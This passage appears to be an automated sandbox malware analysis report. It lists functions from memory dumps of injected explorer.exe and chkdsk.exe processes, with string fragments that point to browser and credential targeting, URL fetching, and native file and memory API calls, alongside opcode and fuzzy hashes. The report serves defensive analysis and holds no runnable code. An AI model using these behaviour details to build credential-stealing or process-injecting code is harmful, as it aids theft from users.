Instruction Fuzzy Hash: 9931F471508B486FD719EF29C4846EAB7D4FB94300F40491FE89BD3252EE34E60ACA43

Uniqueness

Uniqueness Score: -1.00%

Function 0F439FC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON

Download Yara Rule

Strings

.dll, xrefs: 0F439FFE
me_c, xrefs: 0F439FEE
chro, xrefs: 0F43A023
hild, xrefs: 0F439FF6

Memory Dump Source

Source File: 00000003.00000002.4102372466.000000000F3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F3D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f3d0000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction ID: 98aa9b03a7ae3cc28b7e4bacef2c83c9bb33de967bc76dc24603413a8befc5eb
Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction Fuzzy Hash: 2231A031518B184FC784EF698494BAAB7E1FF98300F84063E984ECB256DF34D545C782

Uniqueness

Uniqueness Score: -1.00%

Function 0F439FBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON

Download Yara Rule

Strings

.dll, xrefs: 0F439FFE
me_c, xrefs: 0F439FEE
chro, xrefs: 0F43A023
hild, xrefs: 0F439FF6

Memory Dump Source

Source File: 00000003.00000002.4102372466.000000000F3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F3D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f3d0000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction ID: af54cf73f950af587d5ba1af2b9a1dd697b2701b3272f92ed487ace287ef5f56
Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction Fuzzy Hash: EB31BE31618B184FC784EF698494BAAB7E1FF98300F84063E984ACB356CF34D545C782

Uniqueness

Uniqueness Score: -1.00%

Function 0F43C8C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

nt: , xrefs: 0F43C91E
urlmon.dll, xrefs: 0F43C959
on.d, xrefs: 0F43C902
User-Agent: , xrefs: 0F43C935, 0F43C948

Memory Dump Source

Source File: 00000003.00000002.4102372466.000000000F3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F3D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f3d0000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: e0c3e62941fd10c44a8950488a67586bc74b5db6af998ad43b7bf9bc09284fea
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: 6C31C071A14B0C8BDB04EFA9D8847EEBBE4FF58214F40022BD85EE7241DE789645C799

Uniqueness

Uniqueness Score: -1.00%

Function 0F43C8BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

nt: , xrefs: 0F43C91E
urlmon.dll, xrefs: 0F43C959
on.d, xrefs: 0F43C902
User-Agent: , xrefs: 0F43C935, 0F43C948

Memory Dump Source

Source File: 00000003.00000002.4102372466.000000000F3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F3D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f3d0000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: 0a7acaf9da3e26e0285bdc8943b58d0e48300434b36e1c835849f67dbd400df2
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: 3E21B170A14B0C8ADB05EFA9C8847EE7BE4FF58204F40421FD85AE7245DE7896458799

Uniqueness

Uniqueness Score: -1.00%

Function 0F43DE92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

l, xrefs: 0F43DF03
., xrefs: 0F43DF1F
t, xrefs: 0F43DEF4
l, xrefs: 0F43DF26

Memory Dump Source

Source File: 00000003.00000002.4102372466.000000000F3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F3D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f3d0000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction ID: 9bbd367919182e2afbb3ecdaf02ab4c703a0ccb17380c2a03aaa3f106c8ac65d
Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction Fuzzy Hash: 01217A70A24B0D9FEB08EFA9D0447AEBAF0FB58304F50462ED409E3601DB78A591CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0F43DE94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

l, xrefs: 0F43DF03
., xrefs: 0F43DF1F
t, xrefs: 0F43DEF4
l, xrefs: 0F43DF26

Memory Dump Source

Source File: 00000003.00000002.4102372466.000000000F3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F3D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f3d0000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction ID: 93a1509d1e6be762e1d106c09d60d3eb96612f26085fc40b2562946d436831e6
Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction Fuzzy Hash: 8C218B70A24B0D9BEB08EFA9D0447EEBBF0FB58304F50462ED409E3601DB78A591CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0F43DFF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON

Download Yara Rule

Strings

logi, xrefs: 0F43E03C
user, xrefs: 0F43E015
pass, xrefs: 0F43E022
auth, xrefs: 0F43E02F

Memory Dump Source

Source File: 00000003.00000002.4102372466.000000000F3D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F3D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f3d0000_explorer.jbxd

Similarity

API ID:
String ID: auth$logi$pass$user
API String ID: 0-2393853802
Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction ID: 437595f37583a2048dc181580e00220ac010793d7f13a624a6f12487e608f8a0
Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction Fuzzy Hash: AD21AE30614B0D8BDB05DF9998806EEB7F1FF88344F00461A980AEB345D7B4E9148BC2

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: chkdsk.exePID: 7464, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	1.7%
Dynamic/Decrypted Code Coverage:	2%
Signature Coverage:	0%
Total number of Nodes:	593
Total number of Limit Nodes:	77

Executed Functions

Function 0505A320 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,05054BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,05054BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0505A36D

Strings

.z`, xrefs: 0505A35D, 0505A368

Memory Dump Source

Source File: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Offset: 05040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5040000_chkdsk.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 6144a1bf958d7e219553100655b70cc09cd2437861e4de2f7a4d2c76ddac8891
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: E6F0BDB2200208ABCB08CF88DC85EEB77ADAF8C754F158248BA0D97240C630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0505A31B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,05054BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,05054BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0505A36D

Strings

.z`, xrefs: 0505A35D, 0505A368

Memory Dump Source

Source File: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Offset: 05040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5040000_chkdsk.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: e9a5829f3ecd303d4de4c08122cbe0567727bdbf73d59f25bb96caa6ba1d595f
Instruction ID: fbc982228054efc5336b9f9a2b73bbcac058eaada48af573a208f34fb8fa8446
Opcode Fuzzy Hash: e9a5829f3ecd303d4de4c08122cbe0567727bdbf73d59f25bb96caa6ba1d595f
Instruction Fuzzy Hash: 6BF0CFB6205108AFDB08CF88DC95EEB77AEEF8C314F158248FA0D97254C630E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0505A44A Relevance: 3.1, APIs: 2, Instructions: 58
nativefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(05054D62,5EB65239,FFFFFFFF,05054A21,?,?,05054D62,?,05054A21,FFFFFFFF,5EB65239,05054D62,?,00000000), ref: 0505A415
NtClose.NTDLL(05054D40,?,?,05054D40,00000000,FFFFFFFF), ref: 0505A475

Memory Dump Source

Source File: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Offset: 05040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5040000_chkdsk.jbxd

Yara matches

Similarity

API ID: CloseFileRead
String ID:
API String ID: 752142053-0
Opcode ID: 71eea9d347804ebae2e05baf8317c3e5ecd9961a6bd74b960778a500f834e6ea
Instruction ID: 02b34a4d3272c4289c22c45b0222ec89ddcc53d90894ff6f96720696778bf341
Opcode Fuzzy Hash: 71eea9d347804ebae2e05baf8317c3e5ecd9961a6bd74b960778a500f834e6ea
Instruction Fuzzy Hash: C3111BB6204104AFDB14DF98EC84DEB77ADEF8C320B148699FA5C87205C630E8118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0505A3D0 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(05054D62,5EB65239,FFFFFFFF,05054A21,?,?,05054D62,?,05054A21,FFFFFFFF,5EB65239,05054D62,?,00000000), ref: 0505A415

Memory Dump Source

Source File: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Offset: 05040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5040000_chkdsk.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: 332ebae7e90919f91c538a770ace330bea90c7ef174d7cd3372eb0175b5b8d3f
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 47F0A4B6200208ABCB14DF89DC85EEB77ADAF8C754F158248BE1D97241D630E8118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0505A4FB Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,05042D11,00002000,00003000,00000004), ref: 0505A539

Memory Dump Source

Source File: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Offset: 05040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5040000_chkdsk.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 73c602d769694cb1c91124c880e51f2dc647e8a9c922d89ae00fb039a20c829f
Instruction ID: 42c3b07814e33cf88bf8e61bd64ba1e0aface362881520c708b1860faa09f5b8
Opcode Fuzzy Hash: 73c602d769694cb1c91124c880e51f2dc647e8a9c922d89ae00fb039a20c829f
Instruction Fuzzy Hash: 6DF01CB6200108BFDB14DF99DC81EEB77ADEF88354F158248FE0997241C634E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0505A500 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,05042D11,00002000,00003000,00000004), ref: 0505A539

Memory Dump Source

Source File: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Offset: 05040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5040000_chkdsk.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 9adf632ba302c1c35e066c27d3a4af1b01408d3c9ff7956aead22c22bc70ca3c
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 3DF015B6200208ABCB14DF89DC81EEB77ADAF88654F118248BE0997241C630F810CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0505A450 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(05054D40,?,?,05054D40,00000000,FFFFFFFF), ref: 0505A475

Memory Dump Source

Source File: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Offset: 05040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5040000_chkdsk.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: a0b55d64daaa36fd67dd7f1a73106a1fa037fc5136af46ec6f418c8f9b530ace
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 90D01776200214ABD710EBD8DC89FEB7BACEF48660F154599BA199B242C530FA0087E0

Uniqueness

Uniqueness Score: -1.00%

Function 05942DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05942DDA

Memory Dump Source

Source File: 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 058D0000, based on PE: true

Associated: 00000004.00000002.4090341330.00000000059F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4090341330.00000000059FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_58d0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 938a65ae293c412d44c9d4ddd76dc487af48008b5bcab7ce07d05d73e6d8262e
Instruction ID: 1b9da8c4d85267cf480581032d51a445c7408a26e8903cd9ace76f5b67c340e2
Opcode Fuzzy Hash: 938a65ae293c412d44c9d4ddd76dc487af48008b5bcab7ce07d05d73e6d8262e
Instruction Fuzzy Hash: DA900222242541525545F1584448507405A97E02517E5C012B5414950C85269966DB21

Uniqueness

Uniqueness Score: -1.00%

Function 05942DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05942DFA

Memory Dump Source

Source File: 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 058D0000, based on PE: true

Associated: 00000004.00000002.4090341330.00000000059F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4090341330.00000000059FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_58d0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2f998f02f57af5e7094e6c0d26689a4dd88f578c1ab9a2adcafbc5521daf64fe
Instruction ID: be647d0c75470c251c75e0b4ece5f5fe043136d3a3be524e6d70dae338c148ce
Opcode Fuzzy Hash: 2f998f02f57af5e7094e6c0d26689a4dd88f578c1ab9a2adcafbc5521daf64fe
Instruction Fuzzy Hash: 5B90023220150413D111B1584548707005D87D0251FE5C412B4424558D96568A62A721

Uniqueness

Uniqueness Score: -1.00%

Function 05942D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05942D1A

Memory Dump Source

Source File: 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 058D0000, based on PE: true

Associated: 00000004.00000002.4090341330.00000000059F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4090341330.00000000059FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_58d0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 26713c9fb258b0a17047a2ee1486f46ce57e0ba5f238be8f5e52cfc951be8da0
Instruction ID: 4ff2af41ed3f784fa0393cde8aae796feaeba2d725fabf5459b10c019f799563
Opcode Fuzzy Hash: 26713c9fb258b0a17047a2ee1486f46ce57e0ba5f238be8f5e52cfc951be8da0
Instruction Fuzzy Hash: 7690022A21350002D180B158544C60A005987D1212FE5D415B4015558CC91589795721

Uniqueness

Uniqueness Score: -1.00%

Function 05942CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05942CAA

Memory Dump Source

Source File: 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 058D0000, based on PE: true

Associated: 00000004.00000002.4090341330.00000000059F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4090341330.00000000059FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_58d0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7ff0f0dd20ea5730163283a1755401e286aab50e5115ffe51cb2073491f1f002
Instruction ID: 14ed3e15ded38117b897ff5d3384cb6eb9e6d01bc2f65e7c6332de230049674f
Opcode Fuzzy Hash: 7ff0f0dd20ea5730163283a1755401e286aab50e5115ffe51cb2073491f1f002
Instruction Fuzzy Hash: 5090023220150402D100B598544C646005987E0311FA5D011B9024555EC66589A16731

Uniqueness

Uniqueness Score: -1.00%

Function 05942C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05942C7A

Memory Dump Source

Source File: 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 058D0000, based on PE: true

Associated: 00000004.00000002.4090341330.00000000059F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4090341330.00000000059FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_58d0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2b2ca079805d56084815dc228d54cfbf9fb2859058fbc9f97503682ef58006bb
Instruction ID: 62549b92d4f88bc601ad4dca4413e04987e4166f4bc021d6e9349c2da3a1c3a6
Opcode Fuzzy Hash: 2b2ca079805d56084815dc228d54cfbf9fb2859058fbc9f97503682ef58006bb
Instruction Fuzzy Hash: F490023220158802D110B158844874A005987D0311FA9C411B8424658D869589A17721

Uniqueness

Uniqueness Score: -1.00%

Function 05942C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05942C6A

Memory Dump Source

Source File: 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 058D0000, based on PE: true

Associated: 00000004.00000002.4090341330.00000000059F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4090341330.00000000059FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_58d0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1244968902c549f11598fcc0e48a97689518d84bc11ff5ae16e661802508f1be
Instruction ID: 86c6e3e1f3966d2c4dd1a274daf81ed207e0e85d8dfa37a164a3f5ed8ee67a5e
Opcode Fuzzy Hash: 1244968902c549f11598fcc0e48a97689518d84bc11ff5ae16e661802508f1be
Instruction Fuzzy Hash: 8E90023220150842D100B1584448B46005987E0311FA5C016B4124654D8615C9617B21

Uniqueness

Uniqueness Score: -1.00%

Function 05942FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05942FEA

Memory Dump Source

Source File: 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 058D0000, based on PE: true

Associated: 00000004.00000002.4090341330.00000000059F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4090341330.00000000059FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_58d0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: db066e6848e51ae5110a75721d23429d5f3378042d27ec55354c18e1c5563c05
Instruction ID: 9ce28d9c8d8a6b76d946c51a66e1b43a6f80cf36ffe1aa84ee6716c2ef62c097
Opcode Fuzzy Hash: db066e6848e51ae5110a75721d23429d5f3378042d27ec55354c18e1c5563c05
Instruction Fuzzy Hash: FD900222211D0042D200B5684C58B07005987D0313FA5C115B4154554CC91589715B21

Uniqueness

Uniqueness Score: -1.00%

Function 05942F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05942F3A

Memory Dump Source

Source File: 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 058D0000, based on PE: true

Associated: 00000004.00000002.4090341330.00000000059F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4090341330.00000000059FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_58d0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 02ba8b9b8ef05d61a8e7064140c4d58a6ad6764b89dbbdd8f07cc706d5f1affc
Instruction ID: 42c4c4274cb7ac7236f34e3680f15adfc197ceaae9343e8153e3a7e855ed961e
Opcode Fuzzy Hash: 02ba8b9b8ef05d61a8e7064140c4d58a6ad6764b89dbbdd8f07cc706d5f1affc
Instruction Fuzzy Hash: 3B90026234150442D100B1584458B060059C7E1311FA5C015F5064554D8619CD626726

Uniqueness

Uniqueness Score: -1.00%

Function 05942EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05942EAA

Memory Dump Source

Source File: 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 058D0000, based on PE: true

Associated: 00000004.00000002.4090341330.00000000059F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4090341330.00000000059FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_58d0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a8ab32b87a2d60c323a18dece603e261fb716392efef9c33eb550e2ebb7e25ef
Instruction ID: bdfd9041311f2eb4907873e5bb63bc9b0d35c347a640605a7bb3888b4d6e398b
Opcode Fuzzy Hash: a8ab32b87a2d60c323a18dece603e261fb716392efef9c33eb550e2ebb7e25ef
Instruction Fuzzy Hash: 4990027220150402D140B1584448746005987D0311FA5C011B9064554E86598EE56B65

Uniqueness

Uniqueness Score: -1.00%

Function 05942BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05942BFA

Memory Dump Source

Source File: 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 058D0000, based on PE: true

Associated: 00000004.00000002.4090341330.00000000059F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4090341330.00000000059FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_58d0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6c92fdb8ec4e8da84319200fc13d425d69cce55325b8069b061e951b8a36708d
Instruction ID: 1d315ea0c843c00df2b1998ac78440e3b4740fdf405cfb201b2bbda8ae94025c
Opcode Fuzzy Hash: 6c92fdb8ec4e8da84319200fc13d425d69cce55325b8069b061e951b8a36708d
Instruction Fuzzy Hash: 3790023220150802D180B158444864A005987D1311FE5C015B4025654DCA158B697BA1

Uniqueness

Uniqueness Score: -1.00%

Function 05942BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05942BEA

Memory Dump Source

Source File: 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 058D0000, based on PE: true

Associated: 00000004.00000002.4090341330.00000000059F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4090341330.00000000059FD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4090341330.0000000005A6E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_58d0000_chkdsk.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 984600ef2573ea83023e32877307980a05d2fff822ba663822c4a2c5c6e070ed
Instruction ID: 42487cef88db0899fea30ea37cbff96890a426a3d9f1dd6ee8294245133c53a1
Opcode Fuzzy Hash: 984600ef2573ea83023e32877307980a05d2fff822ba663822c4a2c5c6e070ed
Instruction Fuzzy Hash: 9790023220554842D140B1584448A46006987D0315FA5C011B4064694D96258E65BB61

Uniqueness

Uniqueness Score: -1.00%

Function 05942B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05942B6A

Memory Dump Source

Source File: 00000004.00000002.4090341330.00000000058D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 058D0000, based on PE: true

Associated: 00000004.00000002.4090341330.00000000059F9000.00000040.00001000.00020000.00000000.sdmpDownload File
